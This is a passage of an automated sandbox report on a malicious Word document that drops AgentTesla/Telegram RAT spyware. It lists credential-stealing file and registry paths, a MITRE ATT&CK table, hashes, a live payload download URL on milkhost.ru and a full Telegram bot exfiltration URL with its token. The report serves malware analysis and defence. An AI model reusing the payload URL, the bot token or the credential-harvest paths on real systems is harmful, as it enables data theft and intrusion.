Source: Yara match	File source: 4.2.godsawqop.exe.3320330.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.godsawqop.exe.32ea110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.godsawqop.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: godsawqop.exe PID: 2692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match	File source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR

Remote Access Functionality:

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 4.2.godsawqop.exe.32ea110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.godsawqop.exe.3320330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.godsawqop.exe.3320330.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.godsawqop.exe.32ea110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.godsawqop.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: godsawqop.exe PID: 2692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation211	Valid Accounts1	Valid Accounts1	Disable or Modify Tools1	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Web Service1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Access Token Manipulation1	Obfuscated Files or Information11	Credentials in Registry1	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	Masquerading1	Security Account Manager	Security Software Discovery23	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Encrypted Channel11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Valid Accounts1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Modify Registry1	LSA Secrets	Virtualization/Sandbox Evasion141	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol24	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion141	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection112	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO141021.doc	39%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\godsawqop.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.godsawqop.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
milkhost.ru	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
https://4hCltxiPdhpdC.com	0%	Avira URL Cloud	safe
http://milkhost.ru/trasper/goshcj.exe	100%	Avira URL Cloud	malware
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://mZWVLr.com	0%	Avira URL Cloud	safe
https://api.telegram.orgP	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
milkhost.ru	95.216.94.72	true	true	8%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://milkhost.ru/trasper/goshcj.exe	true	Avira URL Cloud: malware	unknown
https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	godsawqop.exe, 00000005.00000002.725330787.0000000005DB0000.00000002.00020000.sdmp	false		high
https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/	godsawqop.exe, 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, godsawqop.exe, 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp	false		high
https://4hCltxiPdhpdC.com	godsawqop.exe, 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://mZWVLr.com	godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocumentdocument-----	godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	false		high
https://api.telegram.orgP	godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.%s.comPA	godsawqop.exe, 00000005.00000002.725330787.0000000005DB0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.diginotar.nl/cps/pkioverheid0	godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://api.telegram.org	godsawqop.exe, 00000005.00000002.724989043.0000000002633000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net0D	godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmp	false		high
https://secure.comodo.com/CPS0	godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	godsawqop.exe, 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, godsawqop.exe, 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
95.216.94.72	milkhost.ru	Germany		24940	HETZNER-ASDE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	502705
Start date:	14.10.2021
Start time:	10:34:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO141021.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@6/9@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 1% (good quality ratio 1%) Quality average: 77.7% Quality standard deviation: 21.4%
HCA Information:	Successful, ratio: 98% Number of executed functions: 74 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:35:15	API Interceptor	385x Sleep call for process: EQNEDT32.EXE modified
10:35:17	API Interceptor	1398x Sleep call for process: godsawqop.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
149.154.167.220	Purchase Order_0131021.doc	Get hash	malicious	Browse
	SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exe	Get hash	malicious	Browse
	ek3dgxlAe0.exe	Get hash	malicious	Browse
	invoice.exe	Get hash	malicious	Browse
	Ff24G0gf7c.exe	Get hash	malicious	Browse
	Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.html	Get hash	malicious	Browse
	Nuevo pedido de consulta cotizacin.xlsx	Get hash	malicious	Browse
	21ITQXL080104122T7.exe	Get hash	malicious	Browse
	SWIFT_BANKTIA_729928920222.exe	Get hash	malicious	Browse
	R0987653400008789.exe	Get hash	malicious	Browse
	T98765434567898.exe	Get hash	malicious	Browse
	LbmGlrja1Z.exe	Get hash	malicious	Browse
	photos jpg.exe	Get hash	malicious	Browse
	mGaZYvxAsr.exe	Get hash	malicious	Browse
	vbyltST1At.exe	Get hash	malicious	Browse
	PO B 12.exe	Get hash	malicious	Browse
	DHL Shipping Documents REF - WAYBILL 44 7611 9546.exe	Get hash	malicious	Browse
	1st file name DHL - WAYBILL 44 7611 9546.exe	Get hash	malicious	Browse
	DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exe	Get hash	malicious	Browse
	PRESUPUESTO.xlsx	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
milkhost.ru	Purchase_order_21518.doc	Get hash	malicious	Browse	95.216.94.72
	Purchase Order_122021.doc	Get hash	malicious	Browse	95.216.94.72
	Purchase Order_0190.doc__.rtf	Get hash	malicious	Browse	95.216.94.72
api.telegram.org	Purchase Order_0131021.doc	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exe	Get hash	malicious	Browse	149.154.167.220
	presupuesto.xlsx	Get hash	malicious	Browse	149.154.167.220
	ek3dgxlAe0.exe	Get hash	malicious	Browse	149.154.167.220
	invoice.exe	Get hash	malicious	Browse	149.154.167.220
	Ff24G0gf7c.exe	Get hash	malicious	Browse	149.154.167.220
	Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.html	Get hash	malicious	Browse	149.154.167.220
	Nuevo pedido de consulta cotizacin.xlsx	Get hash	malicious	Browse	149.154.167.220
	21ITQXL080104122T7.exe	Get hash	malicious	Browse	149.154.167.220
	SWIFT_BANKTIA_729928920222.exe	Get hash	malicious	Browse	149.154.167.220
	R0987653400008789.exe	Get hash	malicious	Browse	149.154.167.220
	T98765434567898.exe	Get hash	malicious	Browse	149.154.167.220
	LbmGlrja1Z.exe	Get hash	malicious	Browse	149.154.167.220
	photos jpg.exe	Get hash	malicious	Browse	149.154.167.220
	mGaZYvxAsr.exe	Get hash	malicious	Browse	149.154.167.220
	vbyltST1At.exe	Get hash	malicious	Browse	149.154.167.220
	PO B 12.exe	Get hash	malicious	Browse	149.154.167.220
	DHL Shipping Documents REF - WAYBILL 44 7611 9546.exe	Get hash	malicious	Browse	149.154.167.220
	1st file name DHL - WAYBILL 44 7611 9546.exe	Get hash	malicious	Browse	149.154.167.220
	DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exe	Get hash	malicious	Browse	149.154.167.220

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	Purchase Order_0131021.doc	Get hash	malicious	Browse	149.154.167.220
	6GKjXSaJ8E.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exe	Get hash	malicious	Browse	149.154.167.220
	ek3dgxlAe0.exe	Get hash	malicious	Browse	149.154.167.220
	invoice.exe	Get hash	malicious	Browse	149.154.167.220
	Ff24G0gf7c.exe	Get hash	malicious	Browse	149.154.167.220
	Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.html	Get hash	malicious	Browse	149.154.167.220
	Nuevo pedido de consulta cotizacin.xlsx	Get hash	malicious	Browse	149.154.167.220
	21ITQXL080104122T7.exe	Get hash	malicious	Browse	149.154.167.220
	JetCe3om9L.exe	Get hash	malicious	Browse	149.154.167.99
	frj4kNTbl3.exe	Get hash	malicious	Browse	149.154.167.99
	F6RhtCVeTD.exe	Get hash	malicious	Browse	149.154.167.99
	SWIFT_BANKTIA_729928920222.exe	Get hash	malicious	Browse	149.154.167.220
	R0987653400008789.exe	Get hash	malicious	Browse	149.154.167.220
	T98765434567898.exe	Get hash	malicious	Browse	149.154.167.220
	LbmGlrja1Z.exe	Get hash	malicious	Browse	149.154.167.220
	photos jpg.exe	Get hash	malicious	Browse	149.154.167.220
	ET13QJzgLL.exe	Get hash	malicious	Browse	149.154.167.99
	mGaZYvxAsr.exe	Get hash	malicious	Browse	149.154.167.220
	install.exe	Get hash	malicious	Browse	149.154.167.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
36f7277af969a6947a61ae0b815907a1	Purchase Order_0131021.doc	Get hash	malicious	Browse	149.154.167.220
	Order EQE0905.xlsx	Get hash	malicious	Browse	149.154.167.220
	Nuevo pedido de consulta cotizacin.xlsx	Get hash	malicious	Browse	149.154.167.220
	Order EQE090.xlsx	Get hash	malicious	Browse	149.154.167.220
	PO2008095.xlsx	Get hash	malicious	Browse	149.154.167.220
	Order List.xlsx	Get hash	malicious	Browse	149.154.167.220
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	149.154.167.220
	DHL Original Documents.xlsx	Get hash	malicious	Browse	149.154.167.220
	Purchase Order List.xlsm	Get hash	malicious	Browse	149.154.167.220
	img_Especificaci#U00f3n_07102021.doc	Get hash	malicious	Browse	149.154.167.220
	Purchase Order_0190.doc__.rtf	Get hash	malicious	Browse	149.154.167.220
	PO. 2100002.xlsx	Get hash	malicious	Browse	149.154.167.220
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	149.154.167.220
	04OCT2021-USD-178,750.00.xlsx	Get hash	malicious	Browse	149.154.167.220
	TT remittance.xlsx	Get hash	malicious	Browse	149.154.167.220
	TT form.xlsx	Get hash	malicious	Browse	149.154.167.220
	04OCT2021-USD-178,750.00.xlsx	Get hash	malicious	Browse	149.154.167.220
	especificaci#U00f3n 0021.doc	Get hash	malicious	Browse	149.154.167.220
	RF Quotation_04102021.doc	Get hash	malicious	Browse	149.154.167.220
	SteelTrading PO-5579.xlsx.xlsx	Get hash	malicious	Browse	149.154.167.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	486912
Entropy (8bit):	6.762794264214071
Encrypted:	false
SSDEEP:	12288:yUfjnaH1FrQKkmWSc/kmGBbxiB7C7r/vHMUHvVgqA:irlkmWdGNxih2MUHvVgqA
MD5:	D1BAA9515F4C67A7B561938BBD81BC75
SHA1:	E83E455F636443C9F62D8C480FF060F7BB6DE3BE
SHA-256:	1FAC59451F582122CB2E5787E3A936A3001081DE3469E168207DA1A357DF691D
SHA-512:	2FC1E9B771191C52794F99AE1C1CAF70100C2A129634CA230EFA4007145C27D8AE7997AF83B6077BB6702B0D85EEB9F5429096ADAE6D2CC0601DCE0F4F5E171D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://milkhost.ru/trasper/goshcj.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..W.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H..................\....B...b..........................................Ivan Medvedev...2~'....(......(....2~5....(......{...."..}......{...."..}......{...."..}....R~;....(.....{........{...."..}......{...."..}......{...."..}.....~>...~<....(....rKH.p~=....(....(......{...."..}......{...."..}....N.(....~?.....(......{...."..}.....~>...~@....(....rOH.p~B...raH.p~A....(.....d...(....(....>..(O.....}....>.{.....{....Zl>..(O.....}....f.{.....{....Zl#.-

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0008E59B-A89A-4382-AC7E-24705A8EB889}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{773917BE-1BC4-4D2D-91B8-39B324F718F3}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	188416
Entropy (8bit):	3.863555498453346
Encrypted:	false
SSDEEP:	3072:efwcruMprFaUi6TlpCM1s6xgDAQ37OH1Tf2JQx8sx3B5hYxILSD+Kh+:+wwB1lpQLRq95YeLyQ
MD5:	6F3F057D88CECCF9A365CA5B6DEA867A
SHA1:	359FF3E3FCF0B92D4F8703ECCACF2FF20437ED40
SHA-256:	78F1AFC66317FD0069BD6E39ABAC20B93CBC7DB466DD7BB4628AA5A721B899F9
SHA-512:	43238DCB962090162A0E487ED848A3A4A05B8C1BF95A5354EAD872A86341318E42FAEE86946DAF9E2AB6EA4C682785FD7E8C443DB6606169A775DC92F49F7A38
Malicious:	false
Reputation:	low
Preview:	;.'.......?.?.`...%.0.~...[.1._.\|.\|.?.?.?.?.!...5.\|.[.!.9.0.1.1.<.).?.=.,.3.8.<.,.%.<.^.%...?.[.].6.>.+.:.?...;.5.?.#.4.....`.?.,.<.,.^./.\|.<...^.).0.8...?.?.9.$.7.8.].&.=.=.-.5.).(.?.?.`.,.@.7.!.?.[.#.4._.=.1.2.-...<.&.!...1.?.@.].(.>.%.#.@.[.7.-.5.^.+.?.9.2.@.6.4.~.%.?...+.<.$.?.[.3.8.=.4./.6.2.;...=.[.9.6.6.\|.@...;./.^.2....].`.1..8.%./.+.:.).~...2.!.:.~.9.9._.].~.3.%...$.5.0.<.5.0.3.6.?.2.7...1.=.;.3.$.=.(...2.8./.?.9.-.%._.%.+._.?.-./.&.<.3.0...$.'.[.@.:...=.&...&.^._./.?.\|.?.?.:.\|.5.\|.3.-.%._.0.5.#.<.#.;.1.6...^.(.<.<.?...)...+.3.`.@.%.^.!.5...-.,.).?.%.:.%.4.-.3.?.~.4.&.?...(.^.4.>.0.^.$....&..!.,.$.3.....1.0...?.8.:.'.4.;.6.@.%.~../.?..+.4.^.=.^.~.,.%.4.&.^.\|...2...].7.0.7.8.1.?.).@.`.)...?.2.?.?.7.~.+.~.'.]./.!.0.?.%.0.6.0.7.).6.2.+.4.6.].[.:./.?.<.>.2.^.(.^.).?.?.%...'...9.!.=.+.1.....8.?.>...?.!./.\|.+.[.^.'.;.5...?.1.1.-.:.6.#.,.8.$.*.#.[.<.8.].7.\|.9.'.].;.?.`._.3.^.1.3.).;. . . . . . . . . . . . . . . . . . . . . . . . . . . .3.2.3.0.2.2.4. . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7764CFCD-FF48-436A-A353-8D268E618EA5}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3565081771358332
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbs:IiiiiiiiiifdLloZQc8++lsJe1Mzr
MD5:	668274F9187FAC2D76E23525BEF15CD1
SHA1:	B6A89CC80F72A923F0E9C817976863E1182495E5
SHA-256:	70913B160A34D6E68EAB50D1FE24F466A668F6EDC2D3B9E35B308E50F7AAF1DD
SHA-512:	04068962E92E047FC820DC225FB910C2D61A12768D39FBE30A7D80A50CA7340D601AF258A0B8558553551CCC093D1B44F243C2CA4D5F3B1059A3CE623D4C9587
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO141021.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:55 2021, mtime=Mon Aug 30 20:08:55 2021, atime=Thu Oct 14 16:35:13 2021, length=104541, window=hide
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.490732923232248
Encrypted:	false
SSDEEP:	24:8RgqVw/XTTc+bj7fQHeiCQiDv3qGniE/7Eg:8Tq/XTA+HK5GiWB
MD5:	C1B5713041A6C948DC8B4A7D9347B92D
SHA1:	5DC78C646C15F9173BF769CB7973916A96D88029
SHA-256:	B060578DF0D1005651F035FA0CBB390A2B7596790945F237091BC1FD135FE479
SHA-512:	285372BB543A7433344D73E88479058F9A6775FD8366C1869678887EECC399BE527AEFB2E13D685B128C6EA45CB68BC064C08DF0E8950C530781B21C652D8C47
Malicious:	false
Reputation:	low
